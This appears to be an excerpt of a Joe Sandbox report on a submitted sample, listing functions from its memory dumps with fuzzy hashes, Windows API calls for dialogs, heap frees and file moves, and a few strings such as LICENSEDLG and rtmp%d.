Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
Instruction Fuzzy Hash: 327128717043454BDB24DE2CC8D0BAD77E5EFA4304F044A2DF9C68B282DA75DA8987B2

Function 00D7473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction ID: 65395b9b3af77718a1ab3aad9fcfcf4be28517173c53d77d2aeecca589673369
Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
Instruction Fuzzy Hash: 13513570600A8896DB3F89688855BBF2789DB53300F5CC509E98EDB282F715DD4193F3

Function 00D5DE6C Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac48d7ae4e1651b8a90c701f136bb54b2530476a3c19812c69404e663452b0b9
Instruction ID: 098e153729713e7edbf93803d6ad40e3cd75294c5592b35e9c5f4a10683d27d3
Opcode Fuzzy Hash: ac48d7ae4e1651b8a90c701f136bb54b2530476a3c19812c69404e663452b0b9
Instruction Fuzzy Hash: 87816D812197E4AECB5A6F7D78A52B53FA15733241B1D00BBC8CAC63A7C13A865CD731

Function 00D5E8A0 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b9ca8c48f10246650245209c0a75f66e3074650ecb2b9682791c8d79851671e
Instruction ID: c741e4c141a177ae12ce950f3f32899b0d56f22b55dee8435fb9d8a636b55c25
Opcode Fuzzy Hash: 1b9ca8c48f10246650245209c0a75f66e3074650ecb2b9682791c8d79851671e
Instruction Fuzzy Hash: 3A51C2319093D24ECB1ADF24914446EBFE1BEDA315F49489EECD54B203D221974ECBB2

Function 00D5F968 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bc8f84f383d1685f7d3f2f2c816ed877aa0695ce909dbc9e712891591b6a717
Instruction ID: f30def72200e78bb33dfef9a56943484d5c4e625eb4ed6a709c7bc9386ff29c6
Opcode Fuzzy Hash: 0bc8f84f383d1685f7d3f2f2c816ed877aa0695ce909dbc9e712891591b6a717
Instruction Fuzzy Hash: 67512571A087028BC748CF19D48059AF7E1FF88354F058A2EE899A7740DB34EA59CB96

Function 00D637C1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: 87b3fca8f03c3b96b422879c5a7b930e8d599a37e3302e5374d0763dea4cb3a4
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: A531D2B16147558FCB14DF28C8512AABBE0FB95301F144A2DE8D5C7742C739EA49CBB2

Function 00D55F3C Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02e4796520fb9c3d7b99bb1e5505aa64b7c001a5f6e9e460dd9299716fc2f46a
Instruction ID: 6b0ddd4c38db4b8aeb5595365ed420d4dd3ebea2aab3092227ede98b640ed9e9
Opcode Fuzzy Hash: 02e4796520fb9c3d7b99bb1e5505aa64b7c001a5f6e9e460dd9299716fc2f46a
Instruction Fuzzy Hash: 82219872A202614FCB49CF2DECA08367751AB8631174B812BFE46DB3D5C535E925CBB0

Function 00D5DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D5DABE

Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D

Part of subcall function 00D61596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00D90EE8,00000200,00D5D202,00000000,?,00000050,00D90EE8), ref: 00D615B3

_strlen.LIBCMT ref: 00D5DADF
SetDlgItemTextW.USER32(?,00D8E154,?), ref: 00D5DB3F
GetWindowRect.USER32(?,?), ref: 00D5DB79
GetClientRect.USER32(?,?), ref: 00D5DB85
GetWindowLongW.USER32(?,000000F0), ref: 00D5DC25
GetWindowRect.USER32(?,?), ref: 00D5DC52
SetWindowTextW.USER32(?,?), ref: 00D5DC95
GetSystemMetrics.USER32(00000008), ref: 00D5DC9D
GetWindow.USER32(?,00000005), ref: 00D5DCA8
GetWindowRect.USER32(00000000,?), ref: 00D5DCD5
GetWindow.USER32(00000000,00000002), ref: 00D5DD47

Strings

CAPTION, xrefs: 00D5DC77
$%s:, xrefs: 00D5DAB2
d, xrefs: 00D5DBA5

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 250dc51517d330763e237076b924d3c6929c6219bc21c27dfcead4ec6f5badc1
Instruction ID: 67fec86c1ecd6fcf804e7544416df63136149edc07b3e73e5bc597cce42e2e5e
Opcode Fuzzy Hash: 250dc51517d330763e237076b924d3c6929c6219bc21c27dfcead4ec6f5badc1
Instruction Fuzzy Hash: AD818172108341AFD720DF68CD85E6BBBEAEB88705F04091DFA89D3250D670E909CB72

Function 00D7C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00D7C277

Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE2F
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE41
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE53
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE65
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE77
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE89
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BE9B
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BEAD
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BEBF
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BED1
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BEE3
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BEF5
Part of subcall function 00D7BE12: _free.LIBCMT ref: 00D7BF07

_free.LIBCMT ref: 00D7C26C

Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506

_free.LIBCMT ref: 00D7C28E
_free.LIBCMT ref: 00D7C2A3
_free.LIBCMT ref: 00D7C2AE
_free.LIBCMT ref: 00D7C2D0
_free.LIBCMT ref: 00D7C2E3
_free.LIBCMT ref: 00D7C2F1
_free.LIBCMT ref: 00D7C2FC
_free.LIBCMT ref: 00D7C334
_free.LIBCMT ref: 00D7C33B
_free.LIBCMT ref: 00D7C358
_free.LIBCMT ref: 00D7C370

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 8568ddbf1c3b56f7d4b91a0583903f6dac8ae0c1405d573c453157fe975e85d6
Instruction ID: e42376744b9d9a9aec8806714c104ce03a82010b2ffa4438c0e9f237ce9e55cc
Opcode Fuzzy Hash: 8568ddbf1c3b56f7d4b91a0583903f6dac8ae0c1405d573c453157fe975e85d6
Instruction Fuzzy Hash: 953159326006059FEB24AB78D949B5A73EAFF00310F18D42EE54DD7651FE71AD809B78

Function 00D6CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 00D6CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 00D6CD7D

Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2

GetWindowLongW.USER32(00000000,000000F0), ref: 00D6CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00D6CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 00D6CDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00D6CDED
DeleteObject.GDI32(00000000), ref: 00D6CDF4
GetWindow.USER32(00000000,00000002), ref: 00D6CDFD

Strings

STATIC, xrefs: 00D6CD83

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 6897c87d350da4a96b0d3acb5f67e49fdb297a05098b14cc2356f5d27f062a3f
Instruction ID: 20f17bafb5a88b7ff32ed57f3796f08d94521503a586f87b6c633ee945e5f9c3
Opcode Fuzzy Hash: 6897c87d350da4a96b0d3acb5f67e49fdb297a05098b14cc2356f5d27f062a3f
Instruction Fuzzy Hash: C5110633544710FBE2217B609C4AFBF766CEF55751F044620FA92E1192DA7489068BB4

Function 00D78EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D78EC5

Part of subcall function 00D784DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?), ref: 00D784F4
Part of subcall function 00D784DE: GetLastError.KERNEL32(?,?,00D7BFA7,?,00000000,?,00000000,?,00D7BFCE,?,00000007,?,?,00D7C3CB,?,?), ref: 00D78506

_free.LIBCMT ref: 00D78ED1
_free.LIBCMT ref: 00D78EDC
_free.LIBCMT ref: 00D78EE7
_free.LIBCMT ref: 00D78EF2
_free.LIBCMT ref: 00D78EFD
_free.LIBCMT ref: 00D78F08
_free.LIBCMT ref: 00D78F13
_free.LIBCMT ref: 00D78F1E
_free.LIBCMT ref: 00D78F2C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60b01551f0613b55f5d31b581185871b77dd7f1a663a157338bdafc9b994d4e7
Instruction ID: 9611a992ee95867cf7eccb1847c959cdf73ab3e0a86fc5e6347dc0e935381139
Opcode Fuzzy Hash: 60b01551f0613b55f5d31b581185871b77dd7f1a663a157338bdafc9b994d4e7
Instruction Fuzzy Hash: D811D47654010DAFCB15EF94C846CDA3BA6FF04354B0180A1BA0C8B626EA71DA51ABB4

Function 00D52162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

x%u, xrefs: 00D5267A
xc%u, xrefs: 00D526D7
;%u, xrefs: 00D52497

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: f8df1df91dff68087adedae92b4a52dcbe7383655f58ee02c8a8bb465da26d48
Instruction ID: 99f970955c89c97c99766f6e24e788a0b859fdb0b05053622805e81bfee680a9
Opcode Fuzzy Hash: f8df1df91dff68087adedae92b4a52dcbe7383655f58ee02c8a8bb465da26d48
Instruction Fuzzy Hash: 9BF100716043405BDF15EF388895BFE779AAF96302F0C0569FC859B283EA64994CC7B2

Function 00D6ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D5130B: GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
Part of subcall function 00D5130B: SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365

EndDialog.USER32(?,00000001), ref: 00D6AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 00D6AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00D6AD60
SetWindowTextW.USER32(?,?), ref: 00D6AD71
GetDlgItem.USER32(?,00000065), ref: 00D6AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00D6AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00D6ADA4

Strings

LICENSEDLG, xrefs: 00D6ACE4

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: a6b446e5f00b37ca458e70ceb82bd9e4daf9e9ebea66c1a33710132bb37141a7
Instruction ID: 904fe40b095dbec2352fba09da1640ce00de417b9ab1d53ebc0d0581ca3a81e6
Opcode Fuzzy Hash: a6b446e5f00b37ca458e70ceb82bd9e4daf9e9ebea66c1a33710132bb37141a7
Instruction Fuzzy Hash: 8C21A032244305FBD2216B69EC49E3B3B6CEB46B46F050104F684E26A0EA629D01EF72

Function 00D59443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D59448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00D5946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00D5948A

Part of subcall function 00D617AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00D5BB05,00000000,.exe,?,?,00000800,?,?,00D685DF,?), ref: 00D617C2

_swprintf.LIBCMT ref: 00D59526

Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D

MoveFileW.KERNEL32(?,?), ref: 00D59595
MoveFileW.KERNEL32(?,?), ref: 00D595D5

Strings

rtmp%d, xrefs: 00D5950F

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 413b7e43757ed05dd2f1311c2e59177e62c0a85bc111a7f554f64892aefa4313
Instruction ID: f63931a73098feb877f2c6a3c78dba97fa08cd33ab9db2b008eba919b13ecb12
Opcode Fuzzy Hash: 413b7e43757ed05dd2f1311c2e59177e62c0a85bc111a7f554f64892aefa4313
Instruction Fuzzy Hash: 64413C71900258A6CF20EBA48C95AEEB37CEF15782F0444A5BD49E3142EB748B8DDB74

Function 00D60A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00D60A9D

Part of subcall function 00D5ACF5: GetVersionExW.KERNEL32(?), ref: 00D5AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D60AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00D60AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D60AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00D60AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00D60B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 00D60B3D
__aullrem.LIBCMT ref: 00D60BCB

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
